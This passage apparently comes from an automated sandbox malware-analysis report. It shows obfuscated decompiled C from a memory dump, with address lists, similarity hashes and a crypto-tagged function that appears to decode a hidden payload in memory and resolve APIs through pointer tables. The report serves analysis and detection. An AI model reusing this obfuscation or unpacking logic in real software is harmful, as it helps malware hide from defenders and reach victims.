				_t77 = E02279159(_v16, _t89, (_t106 + 0x00000001 - 0x00000001 & 0x00000000) + 1);
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + 1;
				_a4 = _a4 + (_t77 + 0x00000001 - 0x00000001 ^ 0x310) + 0xffffffff;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) | 0x00000316;
				return 0xfffffffffffff815;
			}

0x02271b1e
0x02271b3b
0x02271b45
0x02271b58
0x02271b47
0x02271b47
0x02271b4b
0x02271b4b
0x02271b64
0x02271b66
0x02271b6c
0x02271b70
0x02271b75
0x02271b7e
0x02271b89
0x02271b90
0x02271b9a
0x02271b80
0x02271b80
0x02271b83
0x02271b83
0x02271b9f
0x02271ba8
0x02271bb7
0x02271bc1
0x02271baa
0x02271baa
0x02271bb0
0x02271be4
0x02271bfe
0x02271c01
0x02271c0c
0x02271c1c
0x02271c29
0x02271c3c
0x02271c44
0x02271c47
0x02271c4d
0x02271c56
0x02271c5e
0x02271c74
0x02271c91
0x02271cb3
0x02271ccd

Strings

M~, xrefs: 02271B77

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID: M~
API String ID: 0-3014885260
Opcode ID: 12ddc3b1168ff52f07e762c651a63c9af5d943a6ffcb7562eca4daf5dfd61062
Instruction ID: 31e13c0a5ce5e3d7ec7d8e9bf88168ce61dd2ef346ff18a64b766a0be8580778
Opcode Fuzzy Hash: 12ddc3b1168ff52f07e762c651a63c9af5d943a6ffcb7562eca4daf5dfd61062
Instruction Fuzzy Hash: 9141B273824A059FEB10DE7CCDC97CA3A61EF80339F1883669C399A1DDD37886558B58

Uniqueness

Uniqueness Score: -1.00%

Function 02273A14, Relevance: .9, Instructions: 925
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E02273A14(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _t498;
				signed int _t503;
				void* _t505;
				void* _t506;
				signed int _t510;
				signed int _t513;
				signed int _t516;
				signed int _t521;
				void* _t523;
				void* _t525;
				intOrPtr _t526;
				void _t529;
				signed int _t533;
				intOrPtr _t539;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t554;
				void* _t556;
				signed int _t557;
				void* _t560;
				signed int _t565;
				signed int _t566;
				signed int _t569;
				void* _t573;
				void* _t575;
				signed int _t576;
				signed int _t579;
				intOrPtr _t581;
				signed int _t587;
				signed int _t589;
				void* _t592;
				void* _t594;
				signed int _t595;
				void* _t599;
				void* _t601;
				intOrPtr _t602;
				void* _t605;
				void* _t607;
				void* _t608;
				signed int _t613;
				signed int _t614;
				void* _t616;
				void* _t618;
				signed int _t623;
				void* _t625;
				signed int _t626;
				signed int _t629;
				signed int _t637;
				void* _t639;
				void* _t641;
				void* _t642;
				signed int _t645;
				signed int _t648;
				signed int _t660;
				signed int _t663;
				signed int _t665;
				signed int _t672;
				signed int _t675;
				signed int _t677;
				signed int _t679;
				signed int _t682;
				void* _t685;
				signed int _t692;
				signed int _t693;
				signed int _t702;
				signed int _t704;
				signed int _t706;
				signed int _t708;
				signed int _t712;
				signed int _t714;
				signed int _t717;
				signed int _t720;
				void* _t723;
				signed int _t725;
				signed int _t727;
				signed int _t730;
				signed int _t731;
				signed int _t733;
				signed int _t740;
				signed int _t741;
				signed int _t746;
				signed int _t749;
				signed int _t751;
				signed int _t753;
				signed int _t755;
				signed int _t758;
				signed int _t761;
				signed int _t765;
				signed int _t769;
				signed int _t774;
				signed int _t779;
				signed int _t784;
				signed int _t787;
				signed int _t790;
				signed int _t792;
				signed int _t795;
				signed int _t798;
				void* _t803;
				void* _t810;
				signed int _t812;
				signed int _t815;
				signed int _t820;
				signed int _t823;
				signed int _t825;
				signed int _t828;
				signed int _t834;
				signed int _t839;
				void* _t840;
				signed int _t844;
				signed int _t849;
				void* _t851;
				signed int _t853;
				signed int _t856;
				signed int _t859;
				signed int _t863;
				signed int _t864;
				signed int _t867;
				signed int _t871;
				signed int _t874;
				signed int _t878;
				signed int* _t879;
				signed int* _t880;
				signed int* _t881;
				signed int* _t882;
				signed int* _t883;
				signed int* _t884;
				signed int* _t885;
				signed int* _t889;
				signed int* _t890;
				signed int* _t891;
				signed int* _t892;
				signed int* _t893;
				signed int* _t894;
				signed int* _t895;
				signed int* _t896;
				signed int* _t897;
				signed int* _t898;
				signed int* _t899;
				signed int* _t900;

				_t740 = __edx;
				_t660 = __ebx;
				_push(__edi);
				 *_t878 =  *_t878 ^ __edi;
				 *_t878 =  *_t878 | _t863;
				_t864 = _t878;
				_t879 = _t878 + 0xffffffdc;
				_push(__edi);
				 *_t879 =  *_t879 ^ __edi;
				 *_t879 =  *_t879 | __ebx;
				_push(_a8);
				_pop( *_t2);
				_push(_v40);
				_pop(_t792);
				_t675 = _v48;
				_v48 =  *((intOrPtr*)(_t792 + 0xc));
				_pop( *_t6);
				_v48 =  *((intOrPtr*)(_t792 + 4));
				_pop(_t834);
				 *_t9 = _t864;
				if(_v20 == 1) {
					_v12 = 7;
					_v16 = 1;
					_v28 = 8;
				}
				if(_v20 != 0) {
					if(_v20 != 2) {
						if(_v20 == 4) {
							_t312 = _t660 + 0x41d1be; // 0x41d1be
							_v48 = _t312;
							_t314 = _t660 + 0x41c0a8; // 0x41c0a8
							 *_t879 =  *_t879 & 0x00000000;
							 *_t879 =  *_t879 ^ _t314;
							_push( *((intOrPtr*)(_t660 + 0x41f068))(_t834, _v40));
							_pop( *_t316);
							_push(_v36);
							_pop( *_t318);
							_v12 = 1;
							_t320 = _t660 + 0x41c6f8; // 0x41c6f8
							_v36 = _v36 & 0x00000000;
							 *_t879 =  *_t879 ^ _t320;
							_t544 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36);
							_v36 = _t740;
							 *(_t660 + 0x41c674) =  *(_t660 + 0x41c674) & 0x00000000;
							 *(_t660 + 0x41c674) =  *(_t660 + 0x41c674) | _t740 ^ _v36 | _t544;
							_t769 = _v36;
							_v16 = 0x55;
							_t333 = _t660 + 0x41c356; // 0x41c356
							_v32 = _v32 & 0x00000000;
							 *_t879 =  *_t879 | _t333;
							_t546 =  *((intOrPtr*)(_t660 + 0x41f060))(_v32);
							_v40 = _t792;
							 *(_t660 + 0x41cd7d) =  *(_t660 + 0x41cd7d) & 0x00000000;
							 *(_t660 + 0x41cd7d) =  *(_t660 + 0x41cd7d) | _t792 & 0x00000000 ^ _t546;
							_t792 = _v40;
							_v28 = 2;
							_t345 = _t660 + 0x41cc3e; // 0x41cc3e
							_v40 = _v40 & 0x00000000;
							 *_t879 =  *_t879 ^ _t345;
							_t349 = _t660 + 0x41cf5b; // 0x41cf5b
							 *_t879 =  *_t879 ^ _t834;
							 *_t879 = _t349;
							_t498 =  *((intOrPtr*)(_t660 + 0x41f068))(_t834, _v40);
							_v36 = _t769;
							 *(_t660 + 0x41c1cd) =  *(_t660 + 0x41c1cd) & 0x00000000;
							 *(_t660 + 0x41c1cd) =  *(_t660 + 0x41c1cd) | _t769 & 0x00000000 | _t498;
							_t740 = _v36;
						}
					} else {
						_t221 = _t660 + 0x41cb7a; // 0x41cb7a
						_v32 = 0;
						_v48 = _v48 + _t221;
						_t224 = _t660 + 0x41c8ec; // 0x41c8ec
						_v40 = 0;
						 *_t879 =  *_t879 ^ _t224;
						_t551 =  *((intOrPtr*)(_t660 + 0x41f068))(_v40, _v32);
						 *(_t660 + 0x41c6f4) =  *(_t660 + 0x41c6f4) & 0x00000000;
						 *(_t660 + 0x41c6f4) =  *(_t660 + 0x41c6f4) ^ (_t834 & 0x00000000 | _t551);
						_t844 = _t834;
						_t232 = _t660 + 0x41c379; // 0x41c379
						_v36 = _v36 & 0x00000000;
						 *_t879 =  *_t879 + _t232;
						_t236 = _t660 + 0x41c532; // 0x41c532
						_v36 = _v36 & 0x00000000;
						 *_t879 =  *_t879 | _t236;
						_t554 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36, _v36);
						 *_t879 = _t554;
						_t242 = _t660 + 0x41d201; // 0x41d201
						 *_t879 = _t242;
						_t556 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36, _v40);
						_t702 = _t675 & 0x00000000 |  *_t879;
						_t889 =  &(_t879[1]);
						 *_t889 =  *_t889 + _t792;
						_t810 = _t556;
						_t557 = _t810 + _t702;
						_t812 = 0;
						_t704 = _t702 & 0x00000000 ^ (_t557 ^  *_t889 |  *(_t660 + 0x41cc21));
						_t560 = _t557;
						if(_t704 > _t560) {
							_t246 = _t660 + 0x41c532; // 0x41c532
							 *_t889 =  *_t889 & 0x00000000;
							 *_t889 =  *_t889 | _t246;
							_t247 = _t660 + 0x41d201; // 0x41d201
							_v40 = _v40 & 0x00000000;
							 *_t889 =  *_t889 | _t247;
							_t587 =  *((intOrPtr*)(_t660 + 0x41f064))(_v40, _t740);
							 *(_t660 + 0x41d32e) =  *(_t660 + 0x41d32e) & 0x00000000;
							 *(_t660 + 0x41d32e) =  *(_t660 + 0x41d32e) | _t864 -  *_t889 ^ _t587;
							_t864 = _t864;
						}
						_t890 = _t889 - 0xfffffffc;
						 *_t890 =  *_t890 & 0x00000000;
						 *_t890 =  *_t890 |  *_t889;
						_t256 = _t660 + 0x41d01d; // 0x41d01d
						 *_t890 =  *_t890 ^ _t812;
						 *_t890 =  *_t890 | _t256;
						_t257 = _t660 + 0x41c37d; // 0x41c37d
						 *_t890 = _t257;
						_t565 =  *((intOrPtr*)(_t660 + 0x41f068))(_v32, _t812, _t740);
						_v36 = _t812;
						 *(_t660 + 0x41c9dc) =  *(_t660 + 0x41c9dc) & 0x00000000;
						 *(_t660 + 0x41c9dc) =  *(_t660 + 0x41c9dc) | _t812 & 0x00000000 | _t565;
						_t815 = _v36;
						_t566 =  *((intOrPtr*)(_t660 + 0x41f060))();
						 *_t890 =  *_t890 ^ _t844;
						 *_t890 =  *_t890 | _t566;
						_t267 = _t660 + 0x41c8c2; // 0x41c8c2
						 *_t890 =  *_t890 - _t660;
						 *_t890 =  *_t890 + _t267;
						_t268 = _t660 + 0x41c737; // 0x41c737
						 *_t890 =  *_t890 & 0x00000000;
						 *_t890 =  *_t890 ^ _t268;
						_t569 =  *((intOrPtr*)(_t660 + 0x41f068))(_t815, _t660, _t844);
						 *_t270 = _t569;
						_push(_v36);
						_pop( *_t272);
						_t891 = _t890 - 0xfffffffc;
						_v36 = _t815;
						 *(_t660 + 0x41c606) = _t569 & 0x00000000 |  *_t890;
						_t792 = _v36;
						_v12 = 3;
						_t277 = _t660 + 0x41d2fe; // 0x41d2fe
						_v32 = 0;
						 *_t891 =  *_t891 | _t277;
						_t573 =  *((intOrPtr*)(_t660 + 0x41f060))(_v32);
						 *_t891 =  *_t891 ^ _t792;
						 *_t891 =  *_t891 + _t573;
						_t281 = _t660 + 0x41d22a; // 0x41d22a
						_v40 = _v40 & 0x00000000;
						 *_t891 =  *_t891 | _t281;
						_t575 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _t792);
						_t706 = _t704 & 0x00000000 |  *_t891;
						_t879 =  &(_t891[1]);
						_v40 = _t740;
						_push(_t706 + _t575);
						_t774 = _v40;
						_pop(_t576);
						_v36 = _t576;
						_t708 = _t706 & 0x00000000 ^ (_t576 ^ _v36 |  *(_t660 + 0x41c48f));
						_t579 = _v36;
						if(_t708 > _t579) {
							_t292 = _t660 + 0x41d2fe; // 0x41d2fe
							_v40 = _v40 & 0x00000000;
							 *_t879 =  *_t879 + _t292;
							_t296 = _t660 + 0x41d22a; // 0x41d22a
							_v36 = 0;
							 *_t879 =  *_t879 ^ _t296;
							_t579 =  *((intOrPtr*)(_t660 + 0x41f064))(_v36, _v40);
						}
						 *_t879 = _t844;
						 *(_t660 + 0x41c2cf) = 0 ^ _t579;
						_t834 = 0;
						_v16 = 0x11;
						_t302 = _t660 + 0x41d09f; // 0x41d09f
						 *_t879 =  *_t879 - _t792;
						 *_t879 =  *_t879 + _t302;
						_t581 =  *((intOrPtr*)(_t660 + 0x41f060))(_t792);
						_v40 = _t708;
						 *((intOrPtr*)(_t660 + 0x41ce4e)) = _t581;
						_t675 = _v40;
						_v28 = 4;
						_t308 = _t660 + 0x41c4f7; // 0x41c4f7
						 *_t879 =  *_t879 ^ _t675;
						 *_t879 =  *_t879 + _t308;
						_t498 =  *((intOrPtr*)(_t660 + 0x41f060))(_t675);
						 *_t879 = _t774;
						 *(_t660 + 0x41c895) = 0 ^ _t498;
						_t740 = 0;
					}
					_t741 = _t740 ^ _t740;
					_v48 = _v48 - _t792;
					_v48 = _t741;
					_t357 = _t660 + 0x41c61d; // 0x41c61d
					 *_t879 =  *_t879 ^ _t834;
					 *_t879 = _t357;
					_t503 =  *((intOrPtr*)(_t660 + 0x41f060))(_t834, _t792, _t498);
					 *_t879 = _t503;
					_t360 = _t660 + 0x41cf67; // 0x41cf67
					_v40 = 0;
					 *_t879 =  *_t879 ^ _t360;
					_t505 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _v32);
					_pop( *_t364);
					_t677 = _t675 & 0x00000000 ^ _v40;
					_v40 = _t792;
					_push(_t677 + _t505);
					_t795 = _v40;
					_pop(_t506);
					_t679 = _t677 & 0x00000000 | _t864 & 0x00000000 ^  *(_t660 + 0x41c5dc);
					_t867 = _t864;
					if(_t679 > _t506) {
						_t369 = _t660 + 0x41c61d; // 0x41c61d
						_v32 = 0;
						 *_t879 =  *_t879 ^ _t369;
						_t372 = _t660 + 0x41cf67; // 0x41cf67
						_v36 = 0;
						 *_t879 =  *_t879 | _t372;
						_t539 =  *((intOrPtr*)(_t660 + 0x41f064))(_v36, _v32);
						_v32 = _t679;
						 *((intOrPtr*)(_t660 + 0x41cf4f)) = _t539;
						_t679 = _v32;
					}
					_t880 =  &(_t879[1]);
					 *_t880 = _t679;
					_t682 = 0;
					 *_t880 = _t741 & 0x00000000 |  *_t879;
					_t381 = _t660 + 0x41cef6; // 0x41cef6
					_v32 = _v32 & 0x00000000;
					 *_t880 =  *_t880 | _t381;
					_t385 = _t660 + 0x41ceb9; // 0x41ceb9
					 *_t880 =  *_t880 ^ _t867;
					 *_t880 =  *_t880 ^ _t385;
					_t510 =  *((intOrPtr*)(_t660 + 0x41f068))(_t867, _v32, _v40);
					 *(_t660 + 0x41caf5) =  *(_t660 + 0x41caf5) & 0x00000000;
					 *(_t660 + 0x41caf5) =  *(_t660 + 0x41caf5) | _t682 ^  *_t880 | _t510;
					_t685 = _t682;
					_t881 = _t880 - 0xfffffffc;
					_t746 = _t510 % _v28;
					 *_t881 =  *_t881 & 0x00000000;
					 *_t881 =  *_t881 | _t746;
					_t397 = _t660 + 0x41c52d; // 0x41c52d
					_v40 = 0;
					 *_t881 =  *_t881 ^ _t397;
					_t513 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _t685);
					 *(_t660 + 0x41d106) =  *(_t660 + 0x41d106) & 0x00000000;
					 *(_t660 + 0x41d106) =  *(_t660 + 0x41d106) | _t746 & 0x00000000 | _t513;
					_t749 = _t746;
					_t751 = _t749 & 0x00000000 ^  *_t881;
					_t882 = _t881 - 0xfffffffc;
					_v8 = _v8 - _t751;
					_v40 = 0;
					 *_t882 =  *_t882 | _t751;
					_t409 = _t660 + 0x41c7ee; // 0x41c7ee
					 *_t882 =  *_t882 ^ _t795;
					 *_t882 =  *_t882 ^ _t409;
					_t410 = _t660 + 0x41c513; // 0x41c513
					_v36 = 0;
					 *_t882 =  *_t882 | _t410;
					_t516 =  *((intOrPtr*)(_t660 + 0x41f068))(_v36, _t795, _v40, _t685);
					_v36 = _t834;
					 *(_t660 + 0x41c2a8) =  *(_t660 + 0x41c2a8) & 0x00000000;
					 *(_t660 + 0x41c2a8) =  *(_t660 + 0x41c2a8) ^ _t834 & 0x00000000 ^ _t516;
					_t753 =  *_t882;
					_t883 =  &(_t882[1]);
					_v32 = _t516;
					_v24 = _v24 & 0x00000000;
					_v24 = _v24 | _t516 ^ _v32 ^ _t753;
					_t427 = _t660 + 0x41ccc7; // 0x41ccc7
					_v40 = 0;
					 *_t883 =  *_t883 | _t427;
					_t521 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40);
					 *(_t660 + 0x41cca4) =  *(_t660 + 0x41cca4) & 0x00000000;
					 *(_t660 + 0x41cca4) =  *(_t660 + 0x41cca4) | _t795 -  *_t883 | _t521;
					_t798 = _t795;
					_t839 = _v36 & 0x00000000 ^ _t660 & 0x00000000 ^ _a4;
					_t663 = _t660;
					_t436 = _t663 + 0x41c550; // 0x41c550
					_v36 = 0;
					 *_t883 =  *_t883 + _t436;
					_t523 =  *((intOrPtr*)(_t663 + 0x41f060))(_v36);
					_v36 = 0;
					 *_t883 =  *_t883 + _t523;
					_t442 = _t663 + 0x41d34c; // 0x41d34c
					 *_t883 = _t442;
					_t525 =  *((intOrPtr*)(_t663 + 0x41f060))(_v36, _v36);
					_t884 = _t883 - 0xfffffffc;
					 *_t445 = _t525;
					_v40 = _v40 + (0 ^  *_t883);
					_push(_v40);
					_pop(_t526);
					_t755 = _t753;
					_v32 = _t755;
					_t758 = _v32;
					if( *((intOrPtr*)(_t663 + 0x41ccf8)) > _t526) {
						_t452 = _t663 + 0x41c550; // 0x41c550
						_v32 = _v32 & 0x00000000;
						 *_t884 =  *_t884 + _t452;
						_t456 = _t663 + 0x41d34c; // 0x41d34c
						_v32 = _v32 & 0x00000000;
						 *_t884 =  *_t884 + _t456;
						_t526 =  *((intOrPtr*)(_t663 + 0x41f064))(_v32, _v32);
					}
					_v40 = _t758;
					 *((intOrPtr*)(_t663 + 0x41ce46)) = _t526;
					_t761 = _v40;
					_v32 = _t761;
					_t466 = _t663 + 0x41cb9d; // 0x41cb9d
					 *_t884 =  *_t884 - _t839;
					 *_t884 =  *_t884 | _t466;
					_t467 = _t663 + 0x41cd17; // 0x41cd17
					_v36 = _v36 & 0x00000000;
					 *_t884 =  *_t884 | _t467;
					_t529 =  *((intOrPtr*)(_t663 + 0x41f068))(_v36, _t839);
					 *_t884 = _t798 & 0x00000000 | _t761 & 0x00000000 ^ _t839;
					 *(_t663 + 0x41d015) = 0 ^ _t529;
					_t803 = 0;
					_t840 = _t839 - 1;
					_v32 = 0;
					_push(_v32);
					 *_t884 =  *_t884 | _t663;
					do {
						 *_t475 = _t803;
						_push(_v36);
						_pop(_t692);
						_t693 = _t692 & _v12;
						if(_t693 == 0) {
							_t840 = _t840 + 1;
							_t529 = _t529 & 0x00000000 ^ (_t803 -  *_t884 | _v28);
							_t803 = _t803;
							_t663 =  *(_t529 + _t840) & 0x000000ff;
						}
						_push(_v16);
						_pop( *_t481);
						_push(_v36);
						_pop(_t765);
						asm("rol edx, cl");
						asm("lodsb");
						_t529 = _t529 | _t765 & _t663;
						 *_t803 = _t529;
						_t803 = _t803 + 1;
						_t483 =  &_v8;
						 *_t483 = _v8 - 1;
					} while ( *_t483 != 0);
					_t665 =  *_t884;
					_t885 =  &(_t884[1]);
					_t485 = _t665 + 0x41cc0b; // 0x41cc0b
					 *_t885 =  *_t885 & 0x00000000;
					 *_t885 =  *_t885 ^ _t485;
					_t486 = _t665 + 0x41cbd0; // 0x41cbd0
					 *_t885 =  *_t885 & 0x00000000;
					 *_t885 =  *_t885 | _t486;
					_t533 =  *((intOrPtr*)(_t665 + 0x41f068))(_t867, _t693);
					_v36 = _t693;
					 *(_t665 + 0x41d326) =  *(_t665 + 0x41d326) & 0x00000000;
					 *(_t665 + 0x41d326) =  *(_t665 + 0x41d326) ^ (_t693 ^ _v36 | _t533);
					_v32 = _t665;
					return memcpy(_t803, _t840 + 1, _v24);
				} else {
					_pop( *_t15);
					_t672 = _t660 & 0x00000000 ^ _v32;
					_t17 = _t672 + 0x41cb24; // 0x41cb24
					_v32 = 0;
					 *_t879 =  *_t879 | _t17;
					_t589 =  *((intOrPtr*)(_t672 + 0x41f060))(_v32);
					 *(_t672 + 0x41c76e) =  *(_t672 + 0x41c76e) & 0x00000000;
					 *(_t672 + 0x41c76e) =  *(_t672 + 0x41c76e) ^ _t792 ^ _v48 ^ _t589;
					_t820 = _t792;
					_t25 = _t672 + 0x41c2ba; // 0x41c2ba
					_v48 = _v48 ^ _t820;
					_v48 = _t25;
					_t26 = _t672 + 0x41d1a6; // 0x41d1a6
					 *_t879 =  *_t879 ^ _t820;
					 *_t879 =  *_t879 + _t26;
					_t592 =  *((intOrPtr*)(_t672 + 0x41f060))(_t820, _t820);
					 *_t879 =  *_t879 - _t864;
					 *_t879 =  *_t879 + _t592;
					_t28 = _t672 + 0x41c035; // 0x41c035
					 *_t879 =  *_t879 & 0x00000000;
					 *_t879 =  *_t879 | _t28;
					_t594 =  *((intOrPtr*)(_t672 + 0x41f060))(_t740, _t864);
					_t712 =  *_t879;
					_t892 =  &(_t879[1]);
					_v40 = _t820;
					_push(_t712 + _t594);
					_t823 = _v40;
					_pop(_t595);
					_v40 = _t834;
					_t714 = _t712 & 0x00000000 ^ _t834 & 0x00000000 ^  *(_t672 + 0x41c8ae);
					_t849 = _v40;
					if(_t714 > _t595) {
						_t35 = _t672 + 0x41d1a6; // 0x41d1a6
						 *_t892 =  *_t892 & 0x00000000;
						 *_t892 =  *_t892 ^ _t35;
						_t36 = _t672 + 0x41c035; // 0x41c035
						 *_t892 = _t36;
						_t595 =  *((intOrPtr*)(_t672 + 0x41f064))(_v40, _t672);
						_push(0);
						 *_t892 = _t714;
						 *(_t672 + 0x41d244) = 0 ^ _t595;
					}
					_t893 = _t892 - 0xfffffffc;
					 *_t893 =  *_t893 - _t849;
					 *_t893 =  *_t893 ^ (_t595 & 0x00000000 |  *_t892);
					_t40 = _t672 + 0x41cd30; // 0x41cd30
					 *_t893 =  *_t893 ^ _t849;
					 *_t893 =  *_t893 + _t40;
					_t599 =  *((intOrPtr*)(_t672 + 0x41f060))(_t849, _t849);
					_v36 = 0;
					 *_t893 =  *_t893 + _t599;
					_t44 = _t672 + 0x41c116; // 0x41c116
					 *_t893 = _t44;
					_t601 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v36);
					_t894 =  &(_t893[1]);
					 *_t47 = _t601;
					_v40 = _v40 + (0 ^  *_t893);
					_push(_v40);
					_pop(_t602);
					_t851 = _t849;
					_v40 = _t740;
					_t717 = 0 ^  *(_t672 + 0x41d282);
					_t779 = _v40;
					if(_t717 > _t602) {
						_t54 = _t672 + 0x41cd30; // 0x41cd30
						_v36 = _v36 & 0x00000000;
						 *_t894 =  *_t894 + _t54;
						_t58 = _t672 + 0x41c116; // 0x41c116
						 *_t894 = _t58;
						_t602 =  *((intOrPtr*)(_t672 + 0x41f064))(_v36, _v36);
					}
					_v32 = _t779;
					 *((intOrPtr*)(_t672 + 0x41d2af)) = _t602;
					_t64 = _t672 + 0x41c00f; // 0x41c00f
					_v36 = 0;
					 *_t894 =  *_t894 | _t64;
					_t67 = _t672 + 0x41c17e; // 0x41c17e
					_v40 = _v40 & 0x00000000;
					 *_t894 =  *_t894 | _t67;
					_t605 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v36);
					_v40 = 0;
					 *_t894 =  *_t894 + _t605;
					_t74 = _t672 + 0x41cf79; // 0x41cf79
					 *_t894 =  *_t894 & 0x00000000;
					 *_t894 =  *_t894 | _t74;
					_t607 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40);
					 *_t76 = _t717;
					_push(_v32);
					 *_t78 = _t607;
					_v32 = _v32 + (_t717 & 0x00000000) + _v40;
					_push(_v32);
					_pop(_t608);
					_pop(_t784);
					_push( *((intOrPtr*)(_t672 + 0x41cc9b)));
					_pop( *_t83);
					_push(_v40);
					_pop(_t720);
					if(_t720 > _t608) {
						_t85 = _t672 + 0x41c17e; // 0x41c17e
						 *_t894 =  *_t894 & 0x00000000;
						 *_t894 =  *_t894 + _t85;
						_t86 = _t672 + 0x41cf79; // 0x41cf79
						_v32 = _v32 & 0x00000000;
						 *_t894 =  *_t894 ^ _t86;
						_push( *((intOrPtr*)(_t672 + 0x41f064))(_v32, _t784));
						_pop( *_t91);
						_push(_v40);
						_pop( *_t93);
					}
					_t895 =  &(_t894[1]);
					 *_t895 =  *_t894;
					_t95 = _t672 + 0x41cd11; // 0x41cd11
					 *_t895 =  *_t895 & 0x00000000;
					 *_t895 =  *_t895 + _t95;
					_t96 = _t672 + 0x41c5be; // 0x41c5be
					_v40 = _v40 & 0x00000000;
					 *_t895 =  *_t895 ^ _t96;
					_t613 =  *((intOrPtr*)(_t672 + 0x41f068))(_v40, _t864, _v36);
					 *(_t672 + 0x41caaa) =  *(_t672 + 0x41caaa) & 0x00000000;
					 *(_t672 + 0x41caaa) =  *(_t672 + 0x41caaa) ^ (_t720 & 0x00000000 | _t613);
					_t723 = _t720;
					_t614 =  *((intOrPtr*)(_t672 + 0x41f068))();
					 *_t895 =  *_t895 & 0x00000000;
					 *_t895 =  *_t895 ^ _t614;
					_t106 = _t672 + 0x41d112; // 0x41d112
					_v36 = 0;
					 *_t895 =  *_t895 + _t106;
					_t616 =  *((intOrPtr*)(_t672 + 0x41f060))(_v36, _t823);
					 *_t895 =  *_t895 - _t723;
					 *_t895 =  *_t895 + _t616;
					_t110 = _t672 + 0x41c899; // 0x41c899
					_v40 = 0;
					 *_t895 =  *_t895 | _t110;
					_t618 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _t723);
					_t725 =  *_t895;
					_t896 =  &(_t895[1]);
					 *_t114 = _t618;
					_v36 = _v36 + _t725;
					_push(_v36);
					_pop(_t619);
					_t853 = _t851;
					_v32 = _t784;
					_t727 = _t725 & 0x00000000 | _t784 - _v32 ^  *(_t672 + 0x41c8e8);
					_t787 = _v32;
					if(_t727 > _t619) {
						_t122 = _t672 + 0x41d112; // 0x41d112
						_v40 = _v40 & 0x00000000;
						 *_t896 =  *_t896 ^ _t122;
						_t126 = _t672 + 0x41c899; // 0x41c899
						 *_t896 =  *_t896 - _t672;
						 *_t896 =  *_t896 | _t126;
						_push( *((intOrPtr*)(_t672 + 0x41f064))(_t672, _v40));
						_pop( *_t128);
						_push(_v40);
						_pop( *_t130);
					}
					_t897 =  &(_t896[1]);
					 *(_t672 + 0x41d0d6) =  *(_t672 + 0x41d0d6) & 0x00000000;
					 *(_t672 + 0x41d0d6) =  *(_t672 + 0x41d0d6) ^ _t853 ^  *_t897 ^  *_t896;
					_t856 = _t853;
					_t135 = _t672 + 0x41cc19; // 0x41cc19
					 *_t897 = _t135;
					_t623 =  *((intOrPtr*)(_t672 + 0x41f060))(_v36);
					_v32 = _v32 & 0x00000000;
					 *_t897 =  *_t897 ^ _t623;
					_t141 = _t672 + 0x41c058; // 0x41c058
					_v32 = 0;
					 *_t897 =  *_t897 + _t141;
					_t625 =  *((intOrPtr*)(_t672 + 0x41f060))(_v32, _v32);
					_t898 = _t897 - 0xfffffffc;
					 *_t145 = _t625;
					_v40 = _v40 + (_t727 & 0x00000000) +  *_t897;
					_push(_v40);
					_pop(_t626);
					_t825 = _t823;
					_v36 = _t787;
					_t730 =  *(_t672 + 0x41c493);
					_t790 = _v36;
					if(_t730 > _t626) {
						_t152 = _t672 + 0x41cc19; // 0x41cc19
						 *_t898 =  *_t898 ^ _t730;
						 *_t898 =  *_t898 | _t152;
						_t153 = _t672 + 0x41c058; // 0x41c058
						 *_t898 =  *_t898 & 0x00000000;
						 *_t898 =  *_t898 + _t153;
						_t626 =  *((intOrPtr*)(_t672 + 0x41f064))(_t672, _t730);
					}
					 *_t898 = _t856;
					 *(_t672 + 0x41d0de) = 0 ^ _t626;
					_t859 = 0;
					_t899 = _t864;
					_pop(_t871);
					_t156 = _t672 + 0x41c23b; // 0x41c23b
					 *_t899 =  *_t899 ^ _t790;
					 *_t899 = _t156;
					_t157 = _t672 + 0x41c2e1; // 0x41c2e1
					_v8 = _v8 - _t859;
					_v8 = _v8 | _t157;
					_t629 =  *((intOrPtr*)(_t672 + 0x41f068))(_t859, _t790);
					 *(_t672 + 0x41d2a1) =  *(_t672 + 0x41d2a1) & 0x00000000;
					 *(_t672 + 0x41d2a1) =  *(_t672 + 0x41d2a1) ^ _t825 & 0x00000000 ^ _t629;
					_t828 = _t825;
					_t163 = _t672 + 0x41c6d4; // 0x41c6d4
					_v12 = _v12 ^ _t730;
					_v12 = _v12 + _t163;
					_t164 = _t672 + 0x41cc84; // 0x41cc84
					_v16 = _t164;
					_push( *((intOrPtr*)(_t672 + 0x41f060))(_v32, _t730));
					_pop( *_t167);
					_push(_v40);
					_pop( *_t169);
					_t900 =  &(_t899[1]);
					_v16 = _v16 - _t730;
					_v16 = _v16 + (0 ^ _v16);
					_t170 = _t672 + 0x41c719; // 0x41c719
					_v40 = _v40 & 0x00000000;
					_v20 = _v20 ^ _t170;
					_push( *((intOrPtr*)(_t672 + 0x41f060))(_v40, _t730));
					_pop( *_t175);
					_push(_v36);
					_pop( *_t177);
					_t637 =  *((intOrPtr*)(_t672 + 0x41f060))();
					_v32 = 0;
					_v24 = _v24 ^ _t637;
					_t181 = _t672 + 0x41d2e8; // 0x41d2e8
					_v28 = _v28 ^ _t828;
					_v28 = _v28 | _t181;
					_t639 =  *((intOrPtr*)(_t672 + 0x41f060))(_t828, _v32);
					_v32 = 0;
					_v32 = _v32 + _t639;
					_t185 = _t672 + 0x41ca71; // 0x41ca71
					_v36 = _t185;
					_t641 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v32);
					_pop( *_t188);
					_t731 = _v36;
					_v36 = _t859;
					_push(_t731 + _t641);
					_pop(_t642);
